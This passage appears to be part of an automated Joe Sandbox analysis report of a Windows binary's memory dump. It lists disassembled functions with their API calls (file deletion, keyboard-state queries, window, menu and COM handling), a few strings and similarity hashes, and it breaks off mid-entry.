Part of subcall function 00D8CE59: _wcscmp.LIBCMT ref: 00D8CF49
Part of subcall function 00D8CE59: _wcscmp.LIBCMT ref: 00D8CF5C

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00D8CB8D
DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00D8CC24
CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00D8CC3A
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00D8CC4B
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00D8CC5D

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy
String ID:
API String ID: 152968663-0
Opcode ID: 182b71a30342555f9ab4e05f57f3db26ccb7ccec733c42b33cc732d785bb69c5
Instruction ID: cdb4777ba32874a4801bf8aab59a5be4b850a0886fbcb4b1bb59b7f2684c311a
Opcode Fuzzy Hash: 182b71a30342555f9ab4e05f57f3db26ccb7ccec733c42b33cc732d785bb69c5
Instruction Fuzzy Hash: A4C10BB1900229ABDF11EFA5CC81EEEB7B9EF59310F0440AAF609E6151D7709A84CF75

Function 00D908D9 Relevance: 18.2, APIs: 12, Instructions: 196COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D9090D
_memset.LIBCMT ref: 00D90928
CoInitialize.OLE32(00000000), ref: 00D9093B
SHGetMalloc.SHELL32(?), ref: 00D90945
CoUninitialize.COMBASE ref: 00D9094F
_wcscpy.LIBCMT ref: 00D90993
SHGetDesktopFolder.SHELL32(?), ref: 00D909F5
_wcscpy.LIBCMT ref: 00D90A1B
_wcscpy.LIBCMT ref: 00D90A77
SHBrowseForFolderW.SHELL32 ref: 00D90AA2
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00D90AC5
CoUninitialize.COMBASE ref: 00D90B11

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: _wcscpy$FolderUninitialize_memset$BrowseDesktopFromInitializeListMallocPath
String ID:
API String ID: 3566271842-0
Opcode ID: b4bf3e4a456231660c7d4759cdf448d261ddab320ce4dcf71422e08bcff2a7ad
Instruction ID: 5f78d1af99f3dd3cd26fc3daccb7fda78e906c0c115c9dd7027e82394a01591a
Opcode Fuzzy Hash: b4bf3e4a456231660c7d4759cdf448d261ddab320ce4dcf71422e08bcff2a7ad
Instruction Fuzzy Hash: 12711C75901219AFDB14EFA4D885A9EBBB9EF48314F048096E919EB351D730EE40CFA0

Function 00D8388D Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00D83908
SetKeyboardState.USER32(?), ref: 00D83973
GetAsyncKeyState.USER32(000000A0), ref: 00D83993
GetKeyState.USER32(000000A0), ref: 00D839AA
GetAsyncKeyState.USER32(000000A1), ref: 00D839D9
GetKeyState.USER32(000000A1), ref: 00D839EA
GetAsyncKeyState.USER32(00000011), ref: 00D83A16
GetKeyState.USER32(00000011), ref: 00D83A24
GetAsyncKeyState.USER32(00000012), ref: 00D83A4D
GetKeyState.USER32(00000012), ref: 00D83A5B
GetAsyncKeyState.USER32(0000005B), ref: 00D83A84
GetKeyState.USER32(0000005B), ref: 00D83A92

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 879e74d5708b01f00bbb70050f34d89333694726be851d904555bb3a8adbd63c
Instruction ID: 3853fce46c9f6503db88fafa4e6f86c50c92ffa987ce9931a7d7294a29eedf68
Opcode Fuzzy Hash: 879e74d5708b01f00bbb70050f34d89333694726be851d904555bb3a8adbd63c
Instruction Fuzzy Hash: FB519960A047C569FB35FBA488117EABFB49F01B40F0C459DD5CA561C2DA94DB8CCB72

Function 00D7FAFD Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00D7FB19
GetWindowRect.USER32(00000000,?), ref: 00D7FB2B
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00D7FB89
GetDlgItem.USER32(?,00000002), ref: 00D7FB94
GetWindowRect.USER32(00000000,?), ref: 00D7FBA6
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00D7FBFC
GetDlgItem.USER32(?,000003E9), ref: 00D7FC0A
GetWindowRect.USER32(00000000,?), ref: 00D7FC1B
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00D7FC5E
GetDlgItem.USER32(?,000003EA), ref: 00D7FC6C
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00D7FC89
InvalidateRect.USER32(?,00000000,00000001), ref: 00D7FC96

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: adc909d122dbdf5dbf57de6fdec2613418e8ca638f192169f6e294825efd5da1
Instruction ID: 442ba2abd24189e7a9ad14bc42bd32f51bd32f39919390340d5937b39669cfc2
Opcode Fuzzy Hash: adc909d122dbdf5dbf57de6fdec2613418e8ca638f192169f6e294825efd5da1
Instruction Fuzzy Hash: BA51F071B0020AAFDB18CF69DD95E6EBBB6EB88710F148539F919D7690D7709D00CB20

Function 00D5B039 Relevance: 18.1, APIs: 12, Instructions: 131COMMON

Download Yara Rule

APIs

Part of subcall function 00D5B155: GetWindowLongW.USER32(?,000000EB), ref: 00D5B166

GetSysColor.USER32(0000000F), ref: 00D5B067

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 055f7e8349f3e7eec7e3738ffc807ef829c90283f211d3e7964b775d44ebc391
Instruction ID: 64814fce4b9734ac7de0bf0895f2d50d106fda118e3a72d827c8c106fb0d1f4e
Opcode Fuzzy Hash: 055f7e8349f3e7eec7e3738ffc807ef829c90283f211d3e7964b775d44ebc391
Instruction Fuzzy Hash: 7B419E31100641AFDF205F28DC89BBA3B66AB06732F184266FD668B2E5D7358C46CB31

Function 00D87334 Relevance: 18.1, APIs: 12, Instructions: 113COMMON

Download Yara Rule

APIs

_wcschr.LIBCMT ref: 00D8734C
_wcscpy.LIBCMT ref: 00D8735D
__wsplitpath.LIBCMT ref: 00D87384
__wsplitpath.LIBCMT ref: 00D873A8
_wcscpy.LIBCMT ref: 00D873CA
_wcscpy.LIBCMT ref: 00D873E8
_wcscpy.LIBCMT ref: 00D873F9
_wcscat.LIBCMT ref: 00D87408
_wcscat.LIBCMT ref: 00D8745D
_wcscat.LIBCMT ref: 00D87493
_wcscat.LIBCMT ref: 00D874A5

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
String ID:
API String ID: 136442275-0
Opcode ID: e07f69ed850f54e6c44a6baf7b372647ef6a023b463ebaf8425076dc520b8499
Instruction ID: caa94cc9b7e30a48c61e03979dfedd24d2e66667f34d2e231d61710e37f72fea
Opcode Fuzzy Hash: e07f69ed850f54e6c44a6baf7b372647ef6a023b463ebaf8425076dc520b8499
Instruction Fuzzy Hash: 3E41E9B690412CABDB21EB54CC55EDE73BCEB48314F1441A7B519A2051EA71EBD8CFB0

Function 00D484A6 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 00D484E5
__itow.LIBCMT ref: 00D48519

Part of subcall function 00D62177: _xtow@16.LIBCMT ref: 00D62198

Strings

False, xrefs: 00DB5568
0x%p, xrefs: 00DB5582
%.15g, xrefs: 00D484DF
True, xrefs: 00DB5561

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: __itow__swprintf_xtow@16
String ID: %.15g$0x%p$False$True
API String ID: 1502193981-2263619337
Opcode ID: a5cc29a4441ea58f4b9362ffed16b78d377646f3fc892044178f889f42067562
Instruction ID: 809b120218bfcc94691c2f6cd4ec33cae45e6d3a94ccbdadda60b0d08aa9902d
Opcode Fuzzy Hash: a5cc29a4441ea58f4b9362ffed16b78d377646f3fc892044178f889f42067562
Instruction Fuzzy Hash: B241D271904605EBDB24DF38E841BBA77E5EB48310F24446AE58AD7295EA31DA41DB30

Function 00D65C91 Relevance: 16.8, APIs: 11, Instructions: 257COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D65CCA

Part of subcall function 00D6889E: __getptd_noexit.LIBCMT ref: 00D6889E

__gmtime64_s.LIBCMT ref: 00D65D63
__gmtime64_s.LIBCMT ref: 00D65D99
__gmtime64_s.LIBCMT ref: 00D65DB6
__allrem.LIBCMT ref: 00D65E0C
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D65E28
__allrem.LIBCMT ref: 00D65E3F
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D65E5D
__allrem.LIBCMT ref: 00D65E74
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D65E92
__invoke_watson.LIBCMT ref: 00D65F03

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 44019df33dda40162e7ad5693cac5fdd13db5b94ac58de4e6029986730a9c23d
Instruction ID: 10891d92f7a7e1937036b3687441a4afbe5c2fc85c9e9c78c63cb6ced83cd181
Opcode Fuzzy Hash: 44019df33dda40162e7ad5693cac5fdd13db5b94ac58de4e6029986730a9c23d
Instruction Fuzzy Hash: E171CA71A01F16ABDB149F78DD41B6A73A8EF10724F14823AF514D7686F771DA808BB0

Function 00D857FB Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D85816
GetMenuItemInfoW.USER32(00E018F0,000000FF,00000000,00000030), ref: 00D85877
SetMenuItemInfoW.USER32(00E018F0,00000004,00000000,00000030), ref: 00D858AD
Sleep.KERNEL32(000001F4), ref: 00D858BF
GetMenuItemCount.USER32(?), ref: 00D85903
GetMenuItemID.USER32(?,00000000), ref: 00D8591F
GetMenuItemID.USER32(?,-00000001), ref: 00D85949
GetMenuItemID.USER32(?,?), ref: 00D8598E
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00D859D4
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00D859E8
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00D85A09

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 8c88a8dde9cb12f0cc8e5527375811ed0c49fdcb4db1f308adb66ee1d01c6583
Instruction ID: 747b51a5af9165e16208006e01af88d37374d214284681cb8432ace3fefc2b99
Opcode Fuzzy Hash: 8c88a8dde9cb12f0cc8e5527375811ed0c49fdcb4db1f308adb66ee1d01c6583
Instruction Fuzzy Hash: A9619D7091064AEFDB11EFA4EC88EBE7BB9EB05358F180159E882E7255D731AD45CB30

Function 00DA9A23 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00DA9AA5
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00DA9AA8
GetWindowLongW.USER32(?,000000F0), ref: 00DA9ACC
_memset.LIBCMT ref: 00DA9ADD
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00DA9AEF
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00DA9B67

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 2d99549ef01b554723b990f307b34d6c4bd7e25665ef970e3f88e060d12bd71a
Instruction ID: a05d31e980dd4edc80e3e68794346617266746884b6dac0f4db0c7f1254ffd83
Opcode Fuzzy Hash: 2d99549ef01b554723b990f307b34d6c4bd7e25665ef970e3f88e060d12bd71a
Instruction Fuzzy Hash: D3616B75900208AFDB14DFA4CC91EEEB7B8EF0A710F144199FA15EB291D770AA45DB60

Function 00D83569 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00D83591
GetAsyncKeyState.USER32(000000A0), ref: 00D83612
GetKeyState.USER32(000000A0), ref: 00D8362D
GetAsyncKeyState.USER32(000000A1), ref: 00D83647
GetKeyState.USER32(000000A1), ref: 00D8365C
GetAsyncKeyState.USER32(00000011), ref: 00D83674
GetKeyState.USER32(00000011), ref: 00D83686
GetAsyncKeyState.USER32(00000012), ref: 00D8369E
GetKeyState.USER32(00000012), ref: 00D836B0
GetAsyncKeyState.USER32(0000005B), ref: 00D836C8
GetKeyState.USER32(0000005B), ref: 00D836DA

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 46d912078697774934df835908c608b35d3df9646091ea98412d6383452339b7
Instruction ID: 3fb31ebb93d76c8470d66aa5fb0b5ae7248a3f324728a11160ed2eee4c587e45
Opcode Fuzzy Hash: 46d912078697774934df835908c608b35d3df9646091ea98412d6383452339b7
Instruction Fuzzy Hash: 7941C8605047CA7DFF31A76889167B5BEA1AB12B44F0C409DD5CA463C2FBA49BC8C772

Function 00D7A28D Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 00D7A2AA
SafeArrayAllocData.OLEAUT32(?), ref: 00D7A2F5
VariantInit.OLEAUT32(?), ref: 00D7A307
SafeArrayAccessData.OLEAUT32(?,?), ref: 00D7A327
VariantCopy.OLEAUT32(?,?), ref: 00D7A36A
SafeArrayUnaccessData.OLEAUT32(?), ref: 00D7A37E
VariantClear.OLEAUT32(?), ref: 00D7A393
SafeArrayDestroyData.OLEAUT32(?), ref: 00D7A3A0
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00D7A3A9
VariantClear.OLEAUT32(?), ref: 00D7A3BB
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00D7A3C6

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: e9f9647ebe2c950050efc9507615648f91c01ecd7c6cc9b0707de66b9ab2a5a8
Instruction ID: f0bb4a9ccffd4b3779a03c9126a4e4ff601ef80471a11c947221f3eef3da1689
Opcode Fuzzy Hash: e9f9647ebe2c950050efc9507615648f91c01ecd7c6cc9b0707de66b9ab2a5a8
Instruction Fuzzy Hash: 30412B3190021AAFCB05DFE8DC84DEEBBB9EF48344F008065E545E3261EB30AA45CBB1

Function 00D9B250 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00D484A6: __swprintf.LIBCMT ref: 00D484E5
Part of subcall function 00D484A6: __itow.LIBCMT ref: 00D48519

CoInitialize.OLE32 ref: 00D9B298
CoUninitialize.COMBASE ref: 00D9B2A3
CoCreateInstance.COMBASE(?,00000000,00000017,00DCD8FC,?), ref: 00D9B303
IIDFromString.COMBASE(?,?), ref: 00D9B376
VariantInit.OLEAUT32(?), ref: 00D9B410
VariantClear.OLEAUT32(?), ref: 00D9B471

Strings

Failed to create object, xrefs: 00D9B30E, 00D9B3C4
NULL Pointer assignment, xrefs: 00D9B348
Invalid parameter, xrefs: 00D9B38F

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 79764bceedd57b34548c19b6de6bf2e7df27f3fd7086c6230994bb87576022d0
Instruction ID: 88ea68e5401a23a733701fb4d392c755c1e371699fc4cb1744b7864b4016e7ac
